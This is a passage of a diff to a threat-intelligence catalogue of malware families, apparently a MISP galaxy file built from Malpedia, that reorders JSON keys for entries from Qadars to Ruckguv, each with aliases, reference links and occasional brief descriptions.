"https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/", "https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "080b2071-2d69-4b76-962e-3d0142074bcb", - "value": "Qadars", - "description": "" + "value": "Qadars" }, { + "description": "", "meta": { - "synonyms": [ - "Qbot", - "Pinkslipbot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", @@ -11560,45 +11559,48 @@ "http://contagiodump.blogspot.com/2010/11/template.html", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html" - ] + ], + "synonyms": [ + "Qbot", + "Pinkslipbot" + ], + "type": [] }, "uuid": "2ccaccd0-8362-4224-8497-2012e7cc7549", - "value": "QakBot", - "description": "" + "value": "QakBot" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost" + ], "synonyms": [ "Tolouge" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost" - ] + "type": [] }, "uuid": "28f35535-dd40-4ee2-8064-5acbe76d8d4c", - "value": "QHost", - "description": "" + "value": "QHost" }, { + "description": "", "meta": { - "synonyms": [ - "qtproject" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/" - ] + ], + "synonyms": [ + "qtproject" + ], + "type": [] }, "uuid": "e8240391-3e3d-4894-ba80-f8e8de8a8222", - "value": "QtBot", - "description": "" + "value": "QtBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quant_loader", "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", @@ -11606,16 +11608,16 @@ "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", "https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549", - "value": "Quant Loader", - "description": "" + "value": "Quant Loader" }, { + "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", @@ -11628,84 +11630,82 @@ "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "05252643-093b-4070-b62f-d5836683a9fa", - "value": "Quasar RAT", - "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult." + "value": "Quasar RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980", "https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965", - "value": "r980", - "description": "" + "value": "r980" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant", "https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c", - "value": "Radamant", - "description": "" + "value": "Radamant" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat", "https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "271752e3-67ca-48bc-ade2-30eec11defca", - "value": "RadRAT", - "description": "" + "value": "RadRAT" }, { + "description": "", "meta": { - "synonyms": [ - "brebsd" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", "https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor" - ] + ], + "synonyms": [ + "brebsd" + ], + "type": [] }, "uuid": "805b99d1-233d-4f7f-b343-440e5d507494", - "value": "Rambo", - "description": "" + "value": "Rambo" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "51f53823-d289-4176-af45-3fca7eda824b", - "value": "Ramdo", - "description": "" + "value": "Ramdo" }, { + "description": "", "meta": { - "synonyms": [ - "Nimnul" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit", "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", @@ -11715,214 +11715,216 @@ "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", "https://research.checkpoint.com/ramnits-network-proxy-servers/" - ] + ], + "synonyms": [ + "Nimnul" + ], + "type": [] }, "uuid": "542161c0-47a4-4297-baca-5ed98386d228", - "value": "Ramnit", - "description": "" + "value": "Ramnit" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus", "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/", "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5d9a27e7-3110-470a-ac0d-2bf00cac7846", - "value": "Ranbyus", - "description": "" + "value": "Ranbyus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam", "http://blog.talosintel.com/2016/07/ranscam.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b", - "value": "Ranscam", - "description": "" + "value": "Ranscam" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc", "https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06", - "value": "Ransoc", - "description": "" + "value": "Ransoc" }, { + "description": "", "meta": { - "synonyms": [ - "WinLock" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock", "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2", "https://forum.malekal.com/viewtopic.php?t=36485&start=" - ] + ], + "synonyms": [ + "WinLock" + ], + "type": [] }, "uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c", - "value": "Ransomlock", - "description": "" + "value": "Ransomlock" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom", "https://twitter.com/malwrhunterteam/status/977275481765613569", "https://twitter.com/malwrhunterteam/status/997748495888076800" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "06929ad3-2a00-4212-b171-9ecb5f956af5", - "value": "Rapid Ransom", - "description": "" + "value": "Rapid Ransom" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer", "http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431", - "value": "RapidStealer", - "description": "" + "value": "RapidStealer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e0a1407f-2595-4bd2-ba16-2c6d9be4e066", - "value": "rarstar", - "description": "" + "value": "rarstar" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratabankapos", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", "http://blog.trex.re.kr/3" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d", - "value": "RatabankaPOS", - "description": "" + "value": "RatabankaPOS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos", "https://threatvector.cylance.com/en_us/home/rawpos-malware.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7", - "value": "RawPOS", - "description": "" + "value": "RawPOS" }, { + "description": "", "meta": { - "synonyms": [ - "Remote Control System", - "Crisis" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs", "https://www.f-secure.com/documents/996508/1030745/callisto-group", "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/" - ] + ], + "synonyms": [ + "Remote Control System", + "Crisis" + ], + "type": [] }, "uuid": "c359c74e-4155-4e66-a344-b56947f75119", - "value": "RCS", - "description": "" + "value": "RCS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdasrv", "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a", - "value": "rdasrv", - "description": "" + "value": "rdasrv" }, { + "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot", "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/", "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9d58d94f-6885-4a38-b086-b9978ac62c1f", - "value": "ReactorBot", - "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot." + "value": "ReactorBot" }, { + "description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "826c31ca-2617-47e4-b236-205da3881182", - "value": "Reaver", - "description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government." + "value": "Reaver" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha", "https://www.recordedfuture.com/redalpha-cyber-campaigns/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", - "value": "RedAlpha", - "description": "" + "value": "RedAlpha" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves", "http://blog.macnica.net/blog/2017/12/post-8c22.html", @@ -11931,69 +11933,69 @@ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", "https://www.jpcert.or.jp/magazine/acreport-redleaves.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a70e93a7-3578-47e1-9926-0818979ed866", - "value": "RedLeaves", - "description": "" + "value": "RedLeaves" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_alert", "https://twitter.com/JaromirHorejsi/status/816237293073797121" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cd5f5165-7bd3-4430-b0bc-2c8fa518f618", - "value": "Red Alert", - "description": "" + "value": "Red Alert" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler", "http://image.ahnlab.com/file_upload/asecissue_files/ASEC%20REPORT_vol.91.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ca8ed7c0-f40b-4c0e-9dc4-52d6e0da41a7", - "value": "Red Gambler", - "description": "" + "value": "Red Gambler" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg", "https://sensepost.com/discover/tools/reGeorg/", "https://github.com/sensepost/reGeorg" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9ee0eb87-7648-4581-b301-7472a48946ad", - "value": "reGeorg", - "description": "" + "value": "reGeorg" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin", "https://www.youtube.com/watch?v=jeLd-gw2bWo" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb", - "value": "Regin", - "description": "" + "value": "Regin" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos", "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", @@ -12004,221 +12006,221 @@ "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", "https://secrary.com/ReversingMalware/RemcosRAT/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2", - "value": "Remcos", - "description": "" + "value": "Remcos" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi", "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf", "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada", - "value": "Remexi", - "description": "" + "value": "Remexi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6a3c3fbc-97ec-4938-b64e-2679e4b73db9", - "value": "Remsec", - "description": "" + "value": "Remsec" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b2b93651-cf64-47f5-a54f-799b919c592c", - "value": "Remy", - "description": "" + "value": "Remy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom", "https://www.coresecurity.com/sites/default/files/resources/2017/03/Behind_Malware_Infection_Chain.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a1f137d4-298f-4761-935d-bd39ab898479", - "value": "Rerdom", - "description": "" + "value": "Rerdom" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup", "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "42fa55e3-e708-4c11-b807-f31573639941", - "value": "Retadup", - "description": "" + "value": "Retadup" }, { + "description": "Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic.", "meta": { - "synonyms": [ - "Tsukuba", - "Werdlod" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/", "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", "https://github.com/cocaman/retefe" - ] + ], + "synonyms": [ + "Tsukuba", + "Werdlod" + ], + "type": [] }, "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", - "value": "Retefe", - "description": "Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic." + "value": "Retefe" }, { + "description": "", "meta": { - "synonyms": [ - "Revetrat" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat", "http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/", "https://isc.sans.edu/diary/rss/22590", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" - ] + ], + "synonyms": [ + "Revetrat" + ], + "type": [] }, "uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f", - "value": "Revenge RAT", - "description": "" + "value": "Revenge RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1", - "value": "RGDoor", - "description": "" + "value": "RGDoor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6703e8ce-2c5e-4a9d-96b4-49e90074b043", - "value": "Rikamanu", - "description": "" + "value": "Rikamanu" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "383021b9-fcf9-4c21-a0e2-d75fb8c0727a", - "value": "Rincux", - "description": "" + "value": "Rincux" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm", "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a85b0619-ed8e-4324-8603-af211d682dac", - "value": "Ripper ATM", - "description": "" + "value": "Ripper ATM" }, { + "description": "", "meta": { - "synonyms": [ - "yellowalbatross" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rock", "https://github.com/securitykitten/malware_references/blob/master/rmshixdAPT-C-15-20160630.pdf" - ] + ], + "synonyms": [ + "yellowalbatross" + ], + "type": [] }, "uuid": "95a26977-295f-4843-ad11-a3d9dcb6c192", - "value": "rock", - "description": "" + "value": "rock" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader", "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1482ffff-47a8-46da-8f47-d363c9d86c0e", - "value": "Rockloader", - "description": "" + "value": "Rockloader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf", - "value": "Rofin", - "description": "" + "value": "Rofin" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "38f57823-ccc2-424b-8140-8ba30325af9c", - "value": "Rokku", - "description": "" + "value": "Rokku" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat", "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", @@ -12227,85 +12229,81 @@ "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/", "https://www.youtube.com/watch?v=uoBQE5s2ba4" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5", - "value": "RokRAT", - "description": "" + "value": "RokRAT" }, { + "description": "", "meta": { - "synonyms": [ - "CarbonGrabber" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik", "http://blogs.cisco.com/security/talos/rombertik" - ] + ], + "synonyms": [ + "CarbonGrabber" + ], + "type": [] }, "uuid": "ab5066b4-d5ff-4f83-9a05-6e74c043a6e1", - "value": "Rombertik", - "description": "" + "value": "Rombertik" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "87a45a07-30d7-4223-ae61-6b1e6dde0f5a", - "value": "Romeo(Alfa,Bravo, ...)", - "description": "" + "value": "Romeo(Alfa,Bravo, ...)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b4a3d0ef-2d7b-4da5-8f90-8213f8f318d9", - "value": "Roopirs", - "description": "" + "value": "Roopirs" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam", "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b", - "value": "Roseam", - "description": "" + "value": "Roseam" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover", "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "53e94bc9-c8d2-4fb6-9c02-00841e454050", - "value": "Rover", - "description": "" + "value": "Rover" }, { + "description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least).", "meta": { - "synonyms": [ - "Mayachok", - "Cidox", - "BkLoader" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix", "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/", @@ -12317,136 +12315,140 @@ "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html", "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html" - ] + ], + "synonyms": [ + "Mayachok", + "Cidox", + "BkLoader" + ], + "type": [] }, "uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f", - "value": "Rovnix", - "description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least)." + "value": "Rovnix" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://github.com/nccgroup/Royal_APT" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72", - "value": "RoyalCli", - "description": "" + "value": "RoyalCli" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://github.com/nccgroup/Royal_APT" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a", - "value": "Royal DNS", - "description": "" + "value": "Royal DNS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena", "https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cf74b7a5-72c0-4c2a-96c1-b3c49fc8f766", - "value": "Rozena", - "description": "" + "value": "Rozena" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm", "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e6952b4d-e96d-4641-a88f-60074776d553", - "value": "RTM", - "description": "" + "value": "RTM" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos", "https://boozallenmts.com/resources/news/rtpos-new-point-sale-malware-family-uncovered" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "89ee2cb0-2c72-4a25-825b-bb56083fdd9b", - "value": "rtpos", - "description": "" + "value": "rtpos" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv", "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2", - "value": "Ruckguv", - "description": "" + "value": "Ruckguv" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ 